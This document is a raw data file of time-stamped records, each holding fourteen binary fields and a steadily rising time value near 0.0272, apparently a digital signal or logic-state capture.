0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177304e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177452e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177504e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177652e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177680e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177704e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177852e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177904e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178052e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178104e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178304e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178452e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178504e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178652e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178680e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178704e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178852e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7178956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7178980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179052e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179104e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179304e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179452e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179504e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179652e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179680e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179704e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179852e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179904e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7179956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7179980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180052e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180104e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180304e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7180452e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7180480e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7304956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7305156e-02 1,1,1,1,1,0,0,0,0,0,0,1,0,1,2.7305196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7305216e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7305788e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7306232e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7306260e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306268e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7306292e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306312e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7306364e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306388e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306392e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7306412e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306436e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306444e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7306492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306512e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306520e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7306540e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306564e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7306588e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306612e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306620e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7306636e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306660e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7306716e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306740e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7306788e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7306812e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7306860e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306892e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7306912e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7306940e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7306988e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307012e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307036e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307060e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307068e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7307112e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307140e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7307144e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307148e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307164e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307188e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307236e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307260e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307288e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307312e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307336e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307340e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7307388e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307412e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307420e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307436e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307460e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307468e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7307484e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307512e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7307516e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307520e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307564e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307588e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307636e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307660e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307712e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307740e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7307764e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307788e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7307836e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307860e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7307888e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307912e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307916e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7307940e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7307964e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7307968e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7307972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308012e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308036e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308088e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308112e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308164e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308188e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308236e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308260e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7308268e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7308288e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7308312e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7308316e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308320e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308340e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308364e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308388e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308412e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,2.7308416e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7308420e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7308460e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7308488e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7308492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308496e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308512e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308536e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308564e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308588e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308612e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308636e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308660e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308684e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308712e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7308740e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7308788e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7308812e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7308836e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7308860e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308912e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7308940e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7308988e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309012e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309060e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309088e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7309092e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7309112e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7309136e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309144e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309164e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309188e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309236e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309260e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309284e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309312e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309340e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309364e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309388e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7309392e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7309436e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7309460e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309488e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309512e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309540e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309564e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309588e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309612e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,2.7309616e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7309620e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7309664e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7309688e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7309692e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309696e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309712e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309740e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309764e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309788e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309812e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309836e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309860e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309884e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309908e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7309960e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7309984e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310012e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310036e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310060e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310084e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310108e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310160e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310184e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310236e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310260e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310284e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310308e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310332e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310360e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310384e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310412e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310436e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310460e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310484e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310508e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310532e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310560e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310584e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310612e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310636e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310660e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310684e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310708e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310732e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310760e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310784e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310812e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310836e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310860e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310884e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310908e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7310960e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7310984e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311012e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311036e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311060e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311084e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311108e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311160e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311188e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311236e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311260e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311288e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311308e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311332e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311360e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311388e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311412e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311436e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311460e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311488e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311508e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311532e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311560e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311588e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311612e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311636e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311660e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311684e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311708e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311732e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311760e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311788e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311812e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311836e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311860e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311884e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311908e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7311960e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7311984e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312012e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312036e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312060e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312084e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312108e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312160e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312184e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312236e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312260e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312284e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312308e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312332e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312360e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312384e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312412e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312436e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312460e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312484e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312508e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312532e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7312560e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7312584e-02 